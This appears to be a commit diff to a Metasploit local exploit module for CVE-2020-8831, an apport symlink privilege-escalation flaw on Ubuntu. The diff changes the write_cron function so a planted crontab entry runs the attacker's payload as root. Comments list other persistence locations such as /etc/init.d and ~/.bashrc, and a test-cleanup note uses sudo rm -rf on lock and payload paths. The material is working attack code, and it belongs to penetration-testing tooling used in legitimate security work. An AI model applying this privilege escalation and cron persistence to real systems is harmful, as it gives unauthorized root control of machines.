Add /etc/ to cron dir

gardnerapp · gardnerapp · commit 68de77ee34d7 · 2025-04-15T15:33:52.000-04:00
diff --git a/modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb b/modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb
@@ -13,6 +13,9 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
 
   def initialize(info = {})
+    # other places besides crontab 
+    # /etc/init.d
+    # ~/.bashrc
     super(
       update_info(
         info,
@@ -72,7 +75,7 @@ def initialize(info = {})
   def check
     # If you are testing the module apport needs to be reinstalled on boot every time with
     # sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb 
-    # sudo rm -rf /var/lock/apport/ -> must be run after each subsequent test!
+    # sudo rm -rf /var/lock/apport/ /tmp/payload /etc/cron.d/lock && unlink /var/lock/apport -> must be run after each subsequent test!
     return CheckCode::Safe('Platform is not Linux') unless session.platform == 'linux'
 
     # Check apport version
@@ -141,8 +144,9 @@ def write_payload
 
   def write_cron
     cron_interval = datastore['CRON_INTERVAL']
-    data = "#{cron_interval} #{@payload_dest}"
+    data = "#{cron_interval} root #{@payload_dest}\n"
     write_file(@cron, data)
+    # crontab won't execute as root if group/other is writable
     print_good "Successfully wrote crontab!"
   end
 
